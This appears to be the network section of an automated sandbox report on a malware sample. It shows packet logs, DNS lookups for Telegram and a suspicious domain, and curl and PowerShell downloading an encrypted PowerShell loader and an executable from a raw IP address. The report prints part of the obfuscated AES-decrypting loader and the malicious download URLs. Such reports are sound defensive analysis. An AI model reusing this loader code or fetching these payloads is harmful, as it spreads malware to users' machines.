                                                                                              Dec 27, 2024 22:33:18.784272909 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.784308910 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.784358025 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.784395933 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.784573078 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.784631968 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.785604000 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.785645962 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:18.785672903 CET49755443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:18.785687923 CET44349755104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:19.136194944 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:19.136527061 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:19.137159109 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:19.137271881 CET49757443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:19.137295961 CET44349757104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:19.158132076 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:19.158168077 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:19.158250093 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:19.158663988 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:19.158680916 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:20.468614101 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:20.468696117 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:20.474669933 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:20.474692106 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:20.475054979 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:20.481695890 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:20.481785059 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:20.481805086 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:21.291850090 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:21.292118073 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:21.292218924 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:21.306498051 CET49759443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:21.306533098 CET44349759104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:21.381881952 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:21.381993055 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:21.382091045 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:21.382606030 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:21.382646084 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:22.642607927 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:22.642715931 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:22.849200010 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:22.849248886 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:22.850253105 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:22.904779911 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:22.904918909 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:22.904993057 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:22.905076981 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:22.905096054 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:23.882906914 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:23.883140087 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:23.883229017 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:23.883451939 CET49761443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:23.883496046 CET44349761104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:24.106549025 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.106595039 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:24.106658936 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.107352018 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.107366085 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:24.112308979 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.112365007 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:24.112449884 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.112715960 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:24.112729073 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.367835999 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.368006945 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.371553898 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.371664047 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.375665903 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.375695944 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.376674891 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.376722097 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.377131939 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.377454996 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.393752098 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.402244091 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.402367115 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.402385950 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.402470112 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.402514935 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:25.402601004 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:25.402616024 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.138804913 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.139117002 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.139198065 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.156665087 CET49763443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.156708002 CET44349763104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.311901093 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.312141895 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.312199116 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.312777996 CET49762443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.312796116 CET44349762104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.380490065 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.380542040 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.380619049 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.380888939 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.380901098 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.504139900 CET49765443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.504184008 CET44349765104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:26.504255056 CET49765443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.504581928 CET49765443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:26.504596949 CET44349765104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:27.646569967 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:27.646795034 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:27.651063919 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:27.651078939 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:27.651309013 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:27.654556990 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:27.654659986 CET49764443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:27.654689074 CET44349764104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:39.533454895 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.533544064 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.533551931 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:39.826833010 CET44349773104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:39.826944113 CET44349773104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:39.827014923 CET49773443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.827186108 CET49773443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:39.827203989 CET44349773104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317163944 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317444086 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.317517042 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.317606926 CET49774443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.317630053 CET44349774104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.582273006 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582307100 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:40.582422972 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582799911 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:40.582809925 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.877209902 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.877377033 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.878696918 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.878710985 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.879154921 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.880471945 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881293058 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881341934 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881458998 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881493092 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881597996 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881647110 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881767035 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881802082 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.881952047 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.881983042 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.882131100 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882163048 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.882170916 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882304907 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.882323980 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927330017 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.927541018 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927591085 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.927603960 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975339890 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:41.975580931 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975619078 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:41.975636959 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:42.023333073 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:42.023535967 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:42.071343899 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:42.242402077 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137309074 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137588978 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.137674093 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.137873888 CET49775443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.137911081 CET44349775104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.142843008 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.142918110 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:44.143013000 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.143285036 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:44.143309116 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.407505035 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.407596111 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.408843040 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.408850908 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.409164906 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:45.410346985 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.410367966 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:45.410439014 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187438965 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187699080 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.187891006 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.187957048 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.187989950 CET44349776104.21.60.24192.168.2.4
                                                                                              Dec 27, 2024 22:33:46.188018084 CET49776443192.168.2.4104.21.60.24
                                                                                              Dec 27, 2024 22:33:46.188034058 CET44349776104.21.60.24192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 22:32:56.205391884 CET | 58819 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:32:56.342873096 CET | 53 | 58819 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 22:33:11.505251884 CET | 61095 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 22:33:11.819262981 CET | 53 | 61095 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 22:32:56.205391884 CET | 192.168.2.4 | 1.1.1.1 | 0xb8c4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:33:11.505251884 CET | 192.168.2.4 | 1.1.1.1 | 0xb81 | Standard query (0) | fivenaii.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 22:32:56.342873096 CET | 1.1.1.1 | 192.168.2.4 | 0xb8c4 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:33:11.819262981 CET | 1.1.1.1 | 192.168.2.4 | 0xb81 | No error (0) | fivenaii.click |  | 104.21.60.24 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 22:33:11.819262981 CET | 1.1.1.1 | 192.168.2.4 | 0xb81 | No error (0) | fivenaii.click |  | 172.67.188.180 | A (IP address) | IN (0x0001) | false
                                                                                              • api.telegram.org
                                                                                              • fivenaii.click
                                                                                              • 147.45.44.131
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 147.45.44.131 | 80 | 7780 | C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:02.008841038 CET | 195 | OUT | GET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 27, 2024 22:33:03.302025080 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = 'o0XW5Z7+/UkATBX8sTyNO9LLcAJGsog4Z+47np5iG5myeBQKGa7OiSGasp6NizETBXHnkIlc/J38aPLonP/pGf3Hq66+2bv/cfpshhcX8HmppezFFnnOwlsBLDAcLIJyysFRjqa9cterQ2tMHJEEv+bCm+ys5RLdjDWInY6uuFVihZLqkdc3Id9jcNMsLqGHT8cknPCi7wkrUR/mjC0Ggk0lwy4bxdRAcwCbmmJ0ep3LQVIQyOptXO9gXE/dzsGuIpdxDQbaXwzcIAqgpqnenHUOMv3cilCoyUdaaSRewmex+DM1QoA6PmkZZLEQrkrDpW3vem/bKOFvrgnuR2C8IyGBHEvmsCJqTCkf2jq3NfmjDqnsS5QLZCuazft30vziIumSGfvrYyWAd5OJP1YXQde59s21K1WY0NQn6n0+rnGUJT64wF5ylX8Kxv1keWC/rV4Ugf7fTpfRwKPgLwf/Z650DCiv+jkc2YubbaE+XIjFQ9NBBNOKgmhnmhOLce3sSiDJmXlZU++MmxIY0wwzd1P8M3InRE4NQqu90QnBj0JmLlbt3MJVBsDMEPfn8GLUcE6Cskc1o7ASk9TIsPmmKpBnEyWcUxQYPlt4syzxOD3AkEcuXcbzzT52K7HZbSLz'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
Dec 27, 2024 22:33:03.302047014 CET | 561 | IN |
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 147.45.44.131 | 80 | 7888 | C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:02.362827063 CET | 195 | OUT | GET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 27, 2024 22:33:03.602217913 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = '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'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
Dec 27, 2024 22:33:03.602278948 CET | 561 | IN |
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 147.45.44.131 | 80 | 7956 | C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:02.730586052 CET | 195 | OUT | GET /infopage/pilgm.ps1 HTTP/1.1
                                                                                              Host: 147.45.44.131
                                                                                              User-Agent: curl/7.83.1
                                                                                              Accept: */*
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 27, 2024 22:33:04.075124979 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:03 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
                                                                                              ETag: "638-62a0d0bb75721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 1592
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = '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'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
Dec 27, 2024 22:33:04.075239897 CET | 561 | IN |
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49737 | 147.45.44.131 | 80 | 7824 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:05.000866890 CET | 181 | OUT | GET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
Dec 27, 2024 22:33:06.356055975 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:06 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49738 | 147.45.44.131 | 80 | 7760 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:05.025715113 CET | 181 | OUT | GET /infopage/ubvsd.exe HTTP/1.1
X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Host: 147.45.44.131
Connection: Keep-Alive
Dec 27, 2024 22:33:06.288124084 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:33:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
ETag: "8e00-62a0cfe2cdd29"
Accept-Ranges: bytes
Content-Length: 36352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49739 | 147.45.44.131 | 80 | 7880 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:05.176923037 CET | 181 | OUT | GET /infopage/ubvsd.exe HTTP/1.1
X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Host: 147.45.44.131
Connection: Keep-Alive
Dec 27, 2024 22:33:06.440737009 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:33:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
ETag: "8e00-62a0cfe2cdd29"
Accept-Ranges: bytes
Content-Length: 36352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49740 | 147.45.44.131 | 80 | 6656 | C:\Windows\SysWOW64\curl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 22:33:07.399923086 CET | 195 | OUT | GET /infopage/pilgm.ps1 HTTP/1.1
Host: 147.45.44.131
User-Agent: curl/7.83.1
Accept: */*
X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
Dec 27, 2024 22:33:08.709621906 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 21:33:08 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 25 Dec 2024 00:09:39 GMT
ETag: "638-62a0d0bb75721"
Accept-Ranges: bytes
Content-Length: 1592
